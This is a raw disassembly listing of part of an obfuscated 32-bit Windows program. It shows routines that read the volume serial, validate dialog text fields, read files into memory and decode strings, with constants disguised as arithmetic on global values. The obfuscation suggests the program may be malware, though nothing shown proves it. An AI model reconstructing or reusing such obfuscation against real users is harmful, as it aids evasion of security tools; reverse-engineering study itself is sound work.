push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
push eax
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call ds:dword_44B614 ; GetVolumeInformationA
push offset dword_44CD90
call sub_43E507
push [ebp+var_10C]
push eax
push edi
call ds:dword_44B634
add esp, 10h
mov eax, dword_44C1D0
add eax, dword_44C184
sub eax, 9
mov [ebp+var_4], eax
jmp short loc_441920
; ---------------------------------------------------------------------------
loc_4418F1: ; CODE XREF: sub_44185A+D3�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 30h
jl short loc_441907
cmp al, 39h
jg short loc_441907
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 31h
loc_441907: ; CODE XREF: sub_44185A+9F�j
; sub_44185A+A3�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 41h
jl short loc_44191D
cmp al, 5Ah
jg short loc_44191D
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 20h
loc_44191D: ; CODE XREF: sub_44185A+B5�j
; sub_44185A+B9�j
inc [ebp+var_4]
loc_441920: ; CODE XREF: sub_44185A+95�j
movsx eax, word_44C1F0
add eax, 5
cmp [ebp+var_4], eax
jb short loc_4418F1
pop edi
leave
retn
sub_44185A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_441932 proc near ; CODE XREF: sub_43CE20+3C�p
; sub_43CE20+C4�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
movzx ebx, byte ptr [eax]
movsx eax, word_44C0BC
mov edx, dword_44C234
lea eax, [eax+edx+0F3h]
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+1]
add ebx, eax
movsx eax, word_44C218
add eax, 0FBh
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+2]
add ebx, eax
mov eax, dword_44C280
movsx edx, word_44C1B4
mov esi, eax
add esi, edx
sub esi, 8
jmp short loc_4419DD
; ---------------------------------------------------------------------------
loc_44198C: ; CODE XREF: sub_441932+B5�j
movsx edi, word_44C208
add edi, dword_44C224
sub edi, 7
sub edi, esi
mov edx, [ebp+arg_4]
mov [ebp+var_4], edx
mov edx, ebx
and edx, 8000003Fh
jge short loc_4419B3
dec edx
or edx, 0FFFFFFC0h
inc edx
loc_4419B3: ; CODE XREF: sub_441932+7A�j
mov ecx, off_44C2BC
mov dl, [ecx+edx]
mov ecx, [ebp+var_4]
mov [ecx+edi], dl
mov eax, ebx
mov edi, dword_44C17C
add edi, 34h
mov ecx, edi
add ecx, dword_44C0F4
cdq
idiv ecx
mov ebx, eax
add esi, 1
loc_4419DD: ; CODE XREF: sub_441932+58�j
movsx eax, word_44C208
dec eax
cmp esi, eax
jl short loc_44198C
pop edi
pop esi
pop ebx
leave
retn
sub_441932 endp
; =============== S U B R O U T I N E =======================================
sub_4419EE proc near ; DATA XREF: .data:0044C364�o
mov eax, 80004001h
retn 10h
sub_4419EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4419F6 proc near ; DATA XREF: sub_43FB8B+F04�o
; sub_43FB8B+F54�o ...
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_219 = byte ptr -219h
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_10E = byte ptr -10Eh
var_108 = byte ptr -108h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 230h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov eax, ebx
cmp eax, 100h
jz short loc_441A27
jl loc_441F65
cmp eax, 111h
jz loc_441AB8
jmp loc_441F65
; ---------------------------------------------------------------------------
loc_441A27: ; CODE XREF: sub_4419F6+19�j
cmp [ebp+arg_8], 9
jnz loc_441F65
mov edi, dword_44C15C
sub edi, 9
jmp short loc_441AA7
; ---------------------------------------------------------------------------
loc_441A3C: ; CODE XREF: sub_4419F6+BB�j
mov eax, 30h
mul edi
mov [ebp+var_208], eax
cmp ds:dword_449380[eax], esi
jnz short loc_441A71
mov eax, 30h
mul edi
mov [ebp+var_20C], eax
push ds:dword_449384[eax]
call ds:dword_448A40 ; SetFocus
jmp loc_441F65
; ---------------------------------------------------------------------------
loc_441A71: ; CODE XREF: sub_4419F6+5A�j
mov eax, 30h
mul edi
mov [ebp+var_20C], eax
cmp ds:dword_449384[eax], esi
jnz short loc_441AA6
mov eax, 30h
mul edi
mov [ebp+var_210], eax
push ds:dword_449388[eax]
call ds:dword_448A40 ; SetFocus
jmp loc_441F65
; ---------------------------------------------------------------------------
loc_441AA6: ; CODE XREF: sub_4419F6+8F�j
inc edi
loc_441AA7: ; CODE XREF: sub_4419F6+44�j
mov eax, dword_44C258
add eax, 62h
cmp edi, eax
jb short loc_441A3C
jmp loc_441F65
; ---------------------------------------------------------------------------
loc_441AB8: ; CODE XREF: sub_4419F6+26�j
mov eax, dword_44C134
mov edi, eax
add edi, dword_44C224
sub edi, 0Dh
jmp short loc_441AE4
; ---------------------------------------------------------------------------
loc_441ACA: ; CODE XREF: sub_4419F6+101�j
mov eax, 30h
mul edi
mov [ebp+var_208], eax
mov eax, ds:dword_44938C[eax]
cmp [ebp+arg_C], eax
jz short loc_441AF9
inc edi
loc_441AE4: ; CODE XREF: sub_4419F6+D2�j
movsx eax, word_44C264
mov edx, dword_44C288
lea eax, [eax+edx+55h]
cmp edi, eax
jb short loc_441ACA
loc_441AF9: ; CODE XREF: sub_4419F6+EB�j
mov eax, dword_44C258
add eax, 5Eh
movsx edx, word_44C180
add eax, edx
cmp edi, eax
jz loc_441F65
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_20C], eax
push ds:dword_449378[eax]
call ds:dword_44BBA4 ; GetWindowTextA
movsx eax, word_44C124
mov byte ptr [ebp+eax+var_20C+2], 4Bh
mov eax, dword_44C0F8
mov edx, dword_44C21C
sub edx, 8
mov byte ptr [ebp+eax+var_20C+2], dl
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_446020
add esp, 8
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_210], eax
push ds:dword_449380[eax]
call ds:dword_44BBA4 ; GetWindowTextA
mov eax, dword_44C0F8
add eax, dword_44C268
movsx eax, [ebp+eax+var_10E]
cmp eax, dword_44C248
jnz short loc_441BF9
push offset byte_44CD6D
call sub_43E507
pop ecx
mov edx, dword_44C18C
add edx, dword_44C09C
sub edx, 5
push edx
push 0
push eax
push 0
call ds:dword_44B644 ; MessageBoxA
mov eax, 30h
mul edi
mov [ebp+var_214], eax
push ds:dword_449380[eax]
call ds:dword_448A40 ; SetFocus
jmp loc_441F65
; ---------------------------------------------------------------------------
loc_441BF9: ; CODE XREF: sub_4419F6+1BC�j
push offset dword_44CD68
call sub_43E507
push eax
lea edx, [ebp+var_204]
push edx
call ds:dword_446020
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_446020
add esp, 14h
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_214], eax
push ds:dword_449384[eax]
call ds:dword_44BBA4 ; GetWindowTextA
mov eax, dword_44C1AC
movsx eax, [ebp+eax+var_108]
mov edx, dword_44C184
sub edx, 2
cmp eax, edx
jnz short loc_441CAD
push offset word_44CD46
call sub_43E507
pop ecx
mov edx, dword_44C19C
add edx, dword_44C25C
sub edx, 0Eh
push edx
push 0
push eax
push 0
call ds:dword_44B644 ; MessageBoxA
mov eax, 30h
mul edi
mov [ebp+var_218], eax
push ds:dword_449384[eax]
call ds:dword_448A40 ; SetFocus
jmp loc_441F65
; ---------------------------------------------------------------------------
loc_441CAD: ; CODE XREF: sub_4419F6+270�j
push offset byte_44CD41
call sub_43E507
push eax
lea edx, [ebp+var_204]
push edx
call ds:dword_446020
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_446020
add esp, 14h
push 0FFh
lea eax, [ebp+var_103]
push eax
mov eax, 30h
mul edi
mov [ebp+var_218], eax
push ds:dword_449388[eax]
call ds:dword_44BBA4 ; GetWindowTextA
movsx eax, word_44C098
movsx eax, [ebp+eax+var_105]
mov edx, dword_44C18C
add edx, dword_44C268
sub edx, 4
cmp eax, edx
jz loc_441E4F
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_441D31: ; CODE XREF: sub_4419F6+340�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_441D31
mov ecx, dword_44C120
sub ecx, 1
cmp eax, ecx
jb loc_441E4F
movsx eax, word_44C150
add eax, dword_44C21C
sub eax, 10h
mov [ebp+var_105], al
jmp short loc_441D83
; ---------------------------------------------------------------------------
loc_441D61: ; CODE XREF: sub_4419F6+3A6�j
movzx eax, [ebp+var_105]
mov al, [ebp+eax+var_103]
cmp al, 30h
jl short loc_441D77
cmp al, 39h
jle short loc_441D7C
loc_441D77: ; CODE XREF: sub_4419F6+37B�j
jmp loc_441E4F
; ---------------------------------------------------------------------------
loc_441D7C: ; CODE XREF: sub_4419F6+37F�j
add [ebp+var_105], 1
loc_441D83: ; CODE XREF: sub_4419F6+369�j
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_441D8C: ; CODE XREF: sub_4419F6+39B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_441D8C
movzx ecx, [ebp+var_105]
cmp ecx, eax
jb short loc_441D61
mov eax, dword_44C280
add eax, dword_44C0D4
sub eax, 0Ah
mov [ebp+var_104], al
jmp short loc_441E2B
; ---------------------------------------------------------------------------
loc_441DB4: ; CODE XREF: sub_4419F6+44E�j
mov al, [ebp+var_104]
mov [ebp+var_219], al
jmp short loc_441DEB
; ---------------------------------------------------------------------------
loc_441DC2: ; CODE XREF: sub_4419F6+40E�j
movzx eax, [ebp+var_219]
movsx eax, [ebp+eax+var_103]
movzx edx, [ebp+var_104]
movsx edx, [ebp+edx+var_103]
cmp eax, edx
jnz short loc_441E06
add [ebp+var_219], 1
loc_441DEB: ; CODE XREF: sub_4419F6+3CA�j
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_441DF4: ; CODE XREF: sub_4419F6+403�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_441DF4
movzx ecx, [ebp+var_219]
cmp ecx, eax
jb short loc_441DC2
loc_441E06: ; CODE XREF: sub_4419F6+3EC�j
movzx eax, [ebp+var_219]
movzx edx, [ebp+var_104]
sub eax, edx
movsx edx, word_44C0BC
sub edx, 6
cmp eax, edx
jg short loc_441E4F
add [ebp+var_104], 1
loc_441E2B: ; CODE XREF: sub_4419F6+3BC�j
lea ecx, [ebp+var_103]
or eax, 0FFFFFFFFh
loc_441E34: ; CODE XREF: sub_4419F6+443�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_441E34
movzx ecx, [ebp+var_104]
cmp ecx, eax
jb loc_441DB4
jmp loc_441EDE
; ---------------------------------------------------------------------------
loc_441E4F: ; CODE XREF: sub_4419F6+32C�j
; sub_4419F6+34D�j ...
mov eax, dword_44C1C4
add eax, 7CBh
push eax
call ds:dword_44B630
push offset a5_0 ; "5"
call sub_43E507
mov [ebp-21Ch], eax
push offset byte_44CCF1
call sub_43E507
movsx edx, word_44C174
sub edx, 7
push edx
push eax
mov edx, [ebp-21Ch]
push edx
push 0
call ds:dword_44B644 ; MessageBoxA
push offset byte_44CCED
call sub_43E507
add esp, 10h
push eax
mov eax, 30h
mul edi
mov [ebp+var_220], eax
mov edx, eax
push ds:dword_449388[edx]
call ds:dword_44B658 ; SetWindowTextA
mov eax, 30h
mul edi
mov [ebp+var_224], eax
push ds:dword_449388[eax]
call ds:dword_448A40 ; SetFocus
jmp loc_441F65
; ---------------------------------------------------------------------------
loc_441EDE: ; CODE XREF: sub_4419F6+454�j
push offset dword_44CCE8
call sub_43E507
push eax
lea edx, [ebp+var_204]
push edx
call ds:dword_446020
lea eax, [ebp+var_103]
push eax
lea eax, [ebp+var_204]
push eax
call ds:dword_446020
mov eax, 30h
mul edi
mov [ebp+var_228], eax
push ds:dword_449378[eax]
call ds:dword_449224 ; DestroyWindow
lea eax, [ebp+var_204]
push eax
call ds:dword_44604C
add esp, 18h
push 5
mov eax, 30h
mul edi
mov [ebp+var_22C], eax
push ds:dword_449374[eax]
call ds:dword_44B65C ; ShowWindow
mov eax, 30h
mul edi
mov [ebp+var_230], eax
and ds:dword_449370[eax], 0
loc_441F65: ; CODE XREF: sub_4419F6+1B�j
; sub_4419F6+2C�j ...
mov eax, dword_44C0C8
movsx edx, word_44C1B4
mov edi, eax
add edi, edx
sub edi, 4
jmp loc_442051
; ---------------------------------------------------------------------------
loc_441F7D: ; CODE XREF: sub_4419F6+667�j
mov eax, 30h
mul edi
mov [ebp+var_8], eax
cmp esi, ds:dword_449380[eax]
jnz short loc_441FB4
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_C], eax
push ds:dword_449390[eax]
call ds:dword_44B60C ; CallWindowProcA
jmp loc_442063
; ---------------------------------------------------------------------------
loc_441FB4: ; CODE XREF: sub_4419F6+598�j
mov eax, 30h
mul edi
mov [ebp+var_10], eax
cmp esi, ds:dword_449384[eax]
jnz short loc_441FE8
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_14], eax
push ds:dword_449394[eax]
call ds:dword_44B60C ; CallWindowProcA
jmp short loc_442063
; ---------------------------------------------------------------------------
loc_441FE8: ; CODE XREF: sub_4419F6+5CF�j
mov eax, 30h
mul edi
mov [ebp+var_18], eax
cmp esi, ds:dword_449388[eax]
jnz short loc_44201C
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_1C], eax
push ds:dword_449398[eax]
call ds:dword_44B60C ; CallWindowProcA
jmp short loc_442063
; ---------------------------------------------------------------------------
loc_44201C: ; CODE XREF: sub_4419F6+603�j
mov eax, 30h
mul edi
mov [ebp+var_20], eax
cmp esi, ds:dword_44937C[eax]
jnz short loc_442050
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp+var_24], eax
push ds:dword_44939C[eax]
call ds:dword_44B60C ; CallWindowProcA
jmp short loc_442063
; ---------------------------------------------------------------------------
loc_442050: ; CODE XREF: sub_4419F6+637�j
inc edi
loc_442051: ; CODE XREF: sub_4419F6+582�j
movsx eax, word_44C0D8
add eax, 62h
cmp edi, eax
jb loc_441F7D
loc_442063: ; CODE XREF: sub_4419F6+5B9�j
; sub_4419F6+5F0�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
sub_4419F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44206A proc near ; CODE XREF: sub_43C974+247�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push 1
push [ebp+arg_4]
call sub_43E5EA
add esp, 8
mov [ebp+var_48], eax
test eax, eax
jnz loc_44228F
mov [ebp+var_18], 8
push offset dword_44CCD8
call sub_441767
pop ecx
push eax
call ds:dword_446044
mov [ebp+var_10], eax
lea eax, [ebp+var_8]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_4]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
movsx eax, word_44C1A4
sub eax, 7
cmp ebx, eax
jnz loc_442277
lea eax, [ebp+var_3C]
push eax
push offset dword_44DA68
mov eax, [ebp+var_8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44C280
add eax, dword_44C20C
sub eax, 0Ah
cmp ebx, eax
jnz loc_44226E
mov [ebp+var_30], 2
mov eax, dword_44C164
sub eax, 4
mov [ebp+var_28], eax
lea eax, [ebp+var_1C]
push eax
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_3C]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, dword_44C288
add eax, dword_44C184
sub eax, 8
cmp ebx, eax
jnz loc_442265
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push offset dword_44DA78
mov eax, [ebp+var_1C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44C160
dec eax
cmp ebx, eax
jnz loc_44225C
inc ds:dword_448620
movsx eax, word_44C104
add eax, 2
cmp ds:dword_448620, eax
jb short loc_4421B7
mov eax, dword_44C0F4
add eax, 3
mov ds:dword_448620, eax
push [ebp+var_4]
call sub_43D523
pop ecx
jmp loc_442253
; ---------------------------------------------------------------------------
loc_4421B7: ; CODE XREF: sub_44206A+130�j
mov eax, dword_44C0AC
movsx edx, word_44C0D8
add eax, edx
sub eax, 3
mov [ebp+var_4C], eax
lea eax, [ebp+var_44]
push eax
push ds:dword_44A640
call sub_44247F
mov [ebp+var_34], eax
lea eax, [ebp+var_40]
push eax
push ds:dword_446018
call sub_44247F
add esp, 10h
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_442213
cmp [ebp+var_34], 0
jz short loc_442213
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_44]
push [ebp+var_34]
call sub_43D622
add esp, 10h
loc_442213: ; CODE XREF: sub_44206A+18C�j
; sub_44206A+192�j
cmp [ebp+var_40], 0
jz short loc_442234
cmp [ebp+var_38], 0
jz short loc_442234
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_40]
push [ebp+var_38]
call sub_43D622
add esp, 10h
loc_442234: ; CODE XREF: sub_44206A+1AD�j
; sub_44206A+1B3�j
push [ebp+var_34]
call ds:dword_44861C ; LocalFree
push [ebp+var_38]
call ds:dword_44861C ; LocalFree
push 0
push [ebp+arg_4]
call sub_43E5EA
add esp, 8
loc_442253: ; CODE XREF: sub_44206A+148�j
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_44225C: ; CODE XREF: sub_44206A+114�j
mov eax, [ebp+var_1C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_442265: ; CODE XREF: sub_44206A+E8�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_44226E: ; CODE XREF: sub_44206A+94�j
mov eax, [ebp+var_8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_442277: ; CODE XREF: sub_44206A+66�j
lea eax, [ebp+var_18]
push eax
call ds:dword_44BBA0
movsx eax, word_44C1E0
sub eax, 3
cmp ebx, eax
jz short $+2
loc_44228F: ; CODE XREF: sub_44206A+1B�j
pop edi
pop esi
pop ebx
leave
retn
sub_44206A endp
; =============== S U B R O U T I N E =======================================
sub_442294 proc near ; DATA XREF: .data:0044C368�o
mov eax, 80004001h
retn 18h
sub_442294 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44229C proc near ; CODE XREF: sub_43DD90+2CE�p
; sub_43F357+263�p
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_316 = byte ptr -316h
var_212 = byte ptr -212h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 330h
push ebx
push esi
push edi
push [ebp+arg_4]
call ds:dword_44B630
pop ecx
push [ebp+arg_0]
lea eax, [ebp+var_316]
push eax
call sub_444F8C
lea ecx, [ebp+var_316]
or eax, 0FFFFFFFFh
loc_4422CA: ; CODE XREF: sub_44229C+33�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4422CA
mov edx, dword_44C1C4
add edx, dword_44C14C
sub edx, 0Ah
mov ebx, eax
sub ebx, edx
mov edx, dword_44C254
sub edx, 9
mov [ebp+ebx+var_316], dl
mov eax, dword_44C268
movsx edx, word_44C0A4
mov edi, eax
add edi, edx
sub edi, 0Ah
loc_442307: ; CODE XREF: sub_44229C+177�j
mov eax, edi
movsx ecx, word_44C240
mul ecx
mov [ebp+var_320], eax
movsx eax, [ebp+edi+var_316]
mov edx, [ebp+var_320]
mov [ebp+edx+var_212], al
mov eax, edi
movsx ecx, word_44C1F0
dec ecx
mul ecx
mov [ebp+var_324], eax
mov eax, dword_44C1F4
movsx edx, word_44C0CC
add eax, edx
sub eax, 0Ah
mov edx, [ebp+var_324]
add edx, eax
mov eax, dword_44C21C
sub eax, 8
mov [ebp+edx+var_212], al
movsx eax, [ebp+edi+var_316]
mov edx, dword_44C114
sub edx, 8
cmp eax, edx
jnz loc_442412
mov eax, edi
mov ecx, dword_44C270
sub ecx, 2
mul ecx
mov [ebp+var_328], eax
mov eax, dword_44C0F8
add eax, dword_44C0EC
sub eax, 9
mov edx, [ebp+var_328]
add edx, eax
movsx eax, word_44C16C
add eax, dword_44C164
sub eax, 5
mov [ebp+edx+var_212], al
mov eax, dword_44C14C
mov [ebp+var_32C], eax
mov eax, edi
mov edx, [ebp+var_32C]
mov ecx, edx
add ecx, dword_44C204
sub ecx, 5
mul ecx
mov [ebp+var_330], eax
mov eax, dword_44C14C
sub eax, 3
mov edx, [ebp+var_330]
add edx, eax
movsx eax, word_44C0B0
movsx ecx, word_44C124
add eax, ecx
sub eax, 0Dh
mov [ebp+edx+var_212], al
jmp short loc_442418
; ---------------------------------------------------------------------------
loc_442412: ; CODE XREF: sub_44229C+DE�j
inc edi
jmp loc_442307
; ---------------------------------------------------------------------------
loc_442418: ; CODE XREF: sub_44229C+174�j
cmp dword_44C2AC, 0
jz short loc_442459
lea eax, [ebp+var_212]
push eax
push 0
call ds:dword_448604
mov esi, eax
or esi, esi
jz short loc_442459
cmp dword_44C2B0, 0
jz short loc_44247A
mov eax, dword_44C13C
sub eax, 2
neg eax
push eax
lea eax, [ebp+var_212]
push eax
push 0
call ds:dword_44601C
loc_442459: ; CODE XREF: sub_44229C+183�j
; sub_44229C+198�j
push ds:dword_448614
push ds:off_44B610
lea eax, [ebp+var_316]
push eax
call sub_442F46
add esp, 0Ch
mov [ebp+var_31C], eax
loc_44247A: ; CODE XREF: sub_44229C+1A1�j
pop edi
pop esi
pop ebx
leave
retn
sub_44229C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44247F proc near ; CODE XREF: sub_43F9B8+18�p
; sub_44206A+16B�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call ds:dword_44B788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4424C8
cmp [ebp+arg_4], 0
jz short loc_4424C4
mov eax, [ebp+arg_4]
movsx edx, word_44C0BC
add edx, dword_44C1AC
sub edx, 0Eh
mov [eax], edx
loc_4424C4: ; CODE XREF: sub_44247F+2E�j
xor eax, eax
jmp short loc_44250C
; ---------------------------------------------------------------------------
loc_4424C8: ; CODE XREF: sub_44247F+28�j
push 0
push edi
call ds:dword_44B624 ; GetFileSize
mov esi, eax
add eax, 10h
push eax
push 40h
call ds:dword_448A34 ; LocalAlloc
mov ebx, eax
push 0
cmp [ebp+arg_4], 0
jz short loc_4424F1
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
jmp short loc_4424F7
; ---------------------------------------------------------------------------
loc_4424F1: ; CODE XREF: sub_44247F+68�j
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
loc_4424F7: ; CODE XREF: sub_44247F+70�j
push [ebp+var_8]
push esi
push ebx
push edi
call ds:dword_446028 ; ReadFile
push edi
call ds:dword_44A654 ; CloseHandle
mov eax, ebx
loc_44250C: ; CODE XREF: sub_44247F+47�j
pop edi
pop esi
pop ebx
leave
retn
sub_44247F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442511 proc near ; CODE XREF: sub_43BB7B+1CA�p
; sub_43CF47+2D9�p ...
var_120A = byte ptr -120Ah
var_110B = byte ptr -110Bh
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 120Ch
call sub_444F6C
push ebx
push esi
push edi
push offset dword_44C8A8
call sub_43E507
push eax
lea edi, [ebp+var_FFF]
push edi
call ds:dword_44B634
add esp, 0Ch
mov esi, dword_44C1B8
sub esi, 5
jmp short loc_442561
; ---------------------------------------------------------------------------
loc_442547: ; CODE XREF: sub_442511+56�j
cmp [ebp+esi+var_FFF], 23h
jnz short loc_442560
mov eax, dword_44C1F8
sub eax, 3
mov [ebp+esi+var_FFF], al
loc_442560: ; CODE XREF: sub_442511+3E�j
inc esi
loc_442561: ; CODE XREF: sub_442511+34�j
cmp esi, 0FFFh
jb short loc_442547
mov eax, dword_44C1B8
sub eax, 5
mov [ebp+var_1004], eax
mov eax, dword_44C0C4
mov ebx, eax
add ebx, dword_44C0C8
sub ebx, 7
cmp [ebp+arg_0], 0
jnz short loc_4425E6
loc_44258D: ; CODE XREF: sub_442511+D3�j
mov eax, [ebp+arg_4]
cmp [ebp+var_1004], eax
jnz short loc_4425AF
lea eax, [ebp+ebx+var_FFF]
push eax
push offset dword_44B670
call sub_444F8C
jmp loc_442839
; ---------------------------------------------------------------------------
loc_4425AF: ; CODE XREF: sub_442511+85�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_4425B9: ; CODE XREF: sub_442511+AD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4425B9
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, dword_44C15C
sub edx, 9
cmp eax, edx
jz loc_442839
jmp short loc_44258D
; ---------------------------------------------------------------------------
loc_4425E6: ; CODE XREF: sub_442511+7A�j
mov eax, dword_44C350
mov [ebp+var_1008], eax
mov eax, dword_44C210
add eax, dword_44C268
sub eax, 5
mov edx, [ebp+arg_0]
mov ecx, dword_44C0D4
sub ecx, 6
mov [edx+eax], cl
mov eax, dword_44C09C
mov ebx, eax
add ebx, dword_44C18C
sub ebx, 5
mov eax, dword_44C1D0
add eax, dword_44C12C
sub eax, 0Fh
mov [ebp+var_1004], eax
loc_442632: ; CODE XREF: sub_442511+300�j
push offset byte_44C89D
call sub_43E507
push eax
lea edi, [ebp+var_110B]
push edi
call sub_444F8C
lea eax, [ebp+ebx+var_FFF]
push eax
lea eax, [ebp+var_110B]
push eax
call ds:dword_446020
add esp, 0Ch
call ds:dword_44BBAC
mov ecx, 14h
cdq
idiv ecx
mov [ebp+var_100C], edx
mov eax, dword_44C090
add eax, dword_44C220
sub eax, 5
cmp edx, eax
jnb loc_442764
push [ebp+var_1008]
lea eax, [ebp+var_120A]
push eax
call sub_43CBE3
mov eax, dword_44C19C
movsx edx, word_44C230
add eax, edx
sub eax, 0Bh
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_43A4B5
add esp, 14h
mov edi, dword_44C220
add edi, 0FFFBh
cmp eax, edi
jnz short loc_4426F8
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call ds:dword_446020
push offset dword_44C898
call sub_43E507
push eax
push [ebp+arg_0]
call ds:dword_446020
add esp, 14h
loc_4426F8: ; CODE XREF: sub_442511+1BE�j
mov eax, dword_44C0DC
sub eax, 2
push eax
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call sub_43A4B5
add esp, 0Ch
mov edi, dword_44C19C
add edi, 0FFF9h
cmp eax, edi
jnz short loc_44275E
push offset byte_44C88D
call sub_43E507
push eax
push [ebp+arg_0]
call ds:dword_446020
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call ds:dword_446020
push offset dword_44C888
call sub_43E507
push eax
push [ebp+arg_0]
call ds:dword_446020
add esp, 20h
loc_44275E: ; CODE XREF: sub_442511+210�j
inc [ebp+var_1008]
loc_442764: ; CODE XREF: sub_442511+174�j
push [ebp+var_1004]
call sub_43ECC9
pop ecx
mov [ebp+var_100C], eax
mov ecx, dword_44C1A8
cmp eax, ecx
